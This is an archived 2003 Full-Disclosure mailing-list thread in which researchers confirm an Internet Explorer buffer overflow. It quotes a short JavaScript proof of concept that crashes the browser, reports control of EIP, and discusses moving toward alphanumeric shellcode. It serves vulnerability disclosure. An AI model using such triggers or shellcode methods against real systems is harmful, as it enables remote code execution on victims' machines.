RE: [Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow

From: Rick (rikul_at_bellsouth.net)
Date: 06/25/03

  • Next message: Joe Stewart: "[Full-Disclosure] Re: Windows Messenger Popup Spam - advisory amended" 
    To: <full-disclosure@lists.netsys.com>
Date: Wed, 25 Jun 2003 11:13:05 -0600

    I got as far as having it jmp to shellcode with byte range 0x20 to 0x7f
    I suppose if you have enough space these should be sufficient to create
    self modifying shellcode which does something important. Does anyone
    know good papers or resource for something like that?

    - Rick Patel

    -----Original Message-----
    From: full-disclosure-admin@lists.netsys.com
    [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of SecurITeam
    BugTraq Monitoring
    Sent: Wednesday, June 25, 2003 5:05 AM
    To: KF; Digital Scream
    Cc: full-disclosure@lists.netsys.com
    Subject: [Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow

    Hi,

    I can confirm it under Windows 2000 with IE 5.50.4807.2300

    Full control over the EIP, but the shellcode cannot contain (as it
    currently
    appears) non Alpha Numeric characters, too bad I guess.

    Thanks
    Noam Rathaus
    CTO
    Beyond Security Ltd
    http://www.SecurITeam.com
    http://www.BeyondSecurity.com
    ----- Original Message -----
    From: "KF" <dotslash@snosoft.com>
    To: "Digital Scream" <digitalscream@real.xakep.ru>
    Sent: Monday, June 23, 2003 6:43 PM
    Subject: Re: Internet Explorer >=5.0 : Buffer overflow

    > I can confirm this on Windows XP Professional
    >
    > version 6.0.2800.1106.xpsp2-030422-1633
    >
    > 0x43534c41 refrenced mem at 0x43534c41
    > -KF
    >
    >
    > Digital Scream wrote:
    >
    > >&lt;script&gt;
    > > wnd=open("about:blank","","");
    > > wnd.moveTo(screen.Width,screen.Height);
    > > WndDoc=wnd.document;
    > > WndDoc.open();
    > > WndDoc.clear();
    > > buffer="";
    > > for(i=1;i<=127;i++)buffer+="X";
    > > buffer+="DigitalScream";
    > > WndDoc.write("<HR align='"+buffer+"'>");
    > > WndDoc.execCommand("SelectAll");
    > > WndDoc.execCommand("Copy");
    > > wnd.close();
    > >&lt;/script&gt;
    > >
    > >Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
    > >
    > >
    > >
    >
    >
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Joe Stewart: "[Full-Disclosure] Re: Windows Messenger Popup Spam - advisory amended"

    Relevant Pages

    • Re: OT? Are chroots immune to buffer overflows?
      ... There has also been shellcode which will listen on a port, ... which it will then execute as shell code thus nullifying the need to have ... > The buffer overflow still works as expected (the bug is in the daemon, ...
      (Vuln-Dev)
    • Re: [Full-disclosure] selling ms office bug
      ... You open a file and shellcode runs? ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure-charter.html ... Hosted and sponsored by Secunia - http://secunia.com/ ...
      (Full-Disclosure)
    • Stack and Buffer Overflow Confusion
      ... at the moment I read a book called "Forbitten Code". ... the own computer with help of a buffer overflow. ... Then I saved the shellcode to a variable SHELLCODE, ...
      (comp.lang.asm.x86)
    • RE: What does the code mean?
      ... Shellcode, which is used in a buffer overflow exploit. ... resource on this... ... Stephane Auger ...
      (Security-Basics)
    • Stack Confusion with Buffer Overflow
      ... at the moment I read a book called "Forbitten Code". ... the own computer with help of a buffer overflow. ... Then I saved the shellcode to a variable SHELLCODE, ...
      (comp.unix.programmer)